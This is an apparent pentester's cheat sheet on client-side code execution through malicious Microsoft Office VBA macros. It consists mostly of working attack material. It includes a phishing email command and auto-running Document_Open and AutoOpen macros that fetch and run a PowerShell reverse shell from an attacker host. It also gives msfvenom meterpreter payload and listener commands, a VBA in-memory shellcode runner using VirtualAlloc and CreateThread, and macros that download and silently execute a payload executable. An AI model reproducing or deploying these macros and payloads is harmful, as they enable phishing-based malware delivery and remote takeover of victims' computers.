Client Side Code Execution

VBA Macro in MS Office

Send email

sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"

Run from Web Server through Powershell In-Memory

kali host web server:

python -m http.server 80

macro vba; scope = doc1

Sub MyMacro()
    Dim str As String
    str = "powershell -ep bypass -nop -c iex ((New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1'))"
    Shell str, vbHide
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Powershell Inside VBA

In-Memory Shellcode VBA Macro without `.exe`

/x64/ shellcode with Dim res As LongPtr for x64 modern MS Office

Workbook_Open() for Excel

VBA Shellcode:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

macro vba; scope = doc1

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr

Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long

Function MyMacro()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long
    Dim res As Long
    
    buf = Array(232, 130, 0, 0, 0, 96, 137…)

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
    
    For counter = LBound(buf) To UBound(buf)
        data = buf(counter)
        res = RtlMoveMemory(addr + counter, data, 1)
    Next counter
    
    res = CreateThread(0, 0, addr, 0, 0, 0)
End Function 

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

The shell dies when closing the doc; resolve by AutoMigrate module in MSF

Metasploit for Pentester: MigrateHacking Articles

VBA AV Bypass

VBA `.exe` Shellcode Download & Execute on Disk

shell.exe to serve in kali:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe

listener:

sudo msfconsole -q -x "use exploit/multi/handler"
set payload windows/x64/meterpreter/reverse_https
set lhost 192.168.119.120
set lport 443
run

kali host web server:

python -m http.server 80

macro vba; scope = doc1

Sub Document_Open()
    MyMacro
End Sub

Sub AutoOpen()
    MyMacro
End Sub

Sub MyMacro()
    Dim str As String
    str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/msfstaged.exe', 'msfstaged.exe')"
    Shell str, vbHide
    Dim exePath As String
    exePath = ActiveDocument.Path + "\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub

Sub Wait(n As Long)
    Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", n, t)
End Sub

IWR alternative MyMacro

Sub MyMacro()
    Dim str As String
    str = "powershell -c "IWR -Uri http://192.168.119.120/msfstaged.exe -OutFile C:\temp\msfstaged.exe"
    Shell str, vbHide
    Dim exePath As String
    exePath = "C:\temp\msfstaged.exe"
    Wait (2)
    Shell exePath, vbHide

End Sub

PreviousUseful NextPowershell rev.ps1

Last updated 1 year ago

Send email

Run from Web Server through Powershell In-Memory

In-Memory Shellcode VBA Macro without .exe

VBA .exe Shellcode Download & Execute on Disk

In-Memory Shellcode VBA Macro without `.exe`

VBA `.exe` Shellcode Download & Execute on Disk